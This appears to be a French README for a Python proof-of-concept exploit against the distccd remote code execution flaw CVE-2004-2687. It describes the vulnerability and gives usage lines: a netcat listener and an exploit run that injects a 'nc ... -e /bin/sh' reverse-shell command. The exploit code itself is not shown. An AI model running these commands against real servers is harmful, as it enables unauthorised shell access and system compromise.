
Exploit de preuve de concept basé sur Python pour la vulnérabilité d'exécution de code à distance distccd CVE-2004-2687, permettant un accès shell non authentifié sur les serveurs vulnérables.
🖥️ -h3x0v3rl0rd- #️⃣ CVE-2004-2687 #️⃣ Mise à niveau vers Python3
Aperçu
Ce dépôt contient un exploit preuve de concept (PoC) pour la vulnérabilité distccd identifiée comme CVE-2004-2687. La vulnérabilité existe dans le démon distccd, qui fait partie du système de compilation distribuée distcc pour C/C++. Lorsqu'il est mal configuré, distccd permet à des attaquants distants d'exécuter des commandes arbitraires sur le serveur sans aucune authentification.
Détails de la vulnérabilité
distcc est conçu pour distribuer des tâches de compilation sur plusieurs machines afin d'accélérer le processus de construction. Cependant, si le démon distccd n'est pas correctement sécurisé, il expose une vulnérabilité d'exécution de code à distance (RCE). Cela se produit car le démon écoute sur un port réseau et accepte les commandes de tout client, leur permettant d'exécuter des commandes shell sur le serveur en tant qu'utilisateur exécutant le démon.
La vulnérabilité a été attribuée CVE-2004-2687 et affecte les versions de distccd antérieures à 3.1. Lorsqu'elle est exploitée, un attaquant peut obtenir un accès shell à la machine vulnérable, conduisant à une compromission potentielle de l'ensemble du système.
nc -lvp 4444
python3 distccd_rce.py -t [rhost] -p 3632 -c "nc [localhost] [lport] -e /bin/sh"
Vulnérabilité :

Exploit :
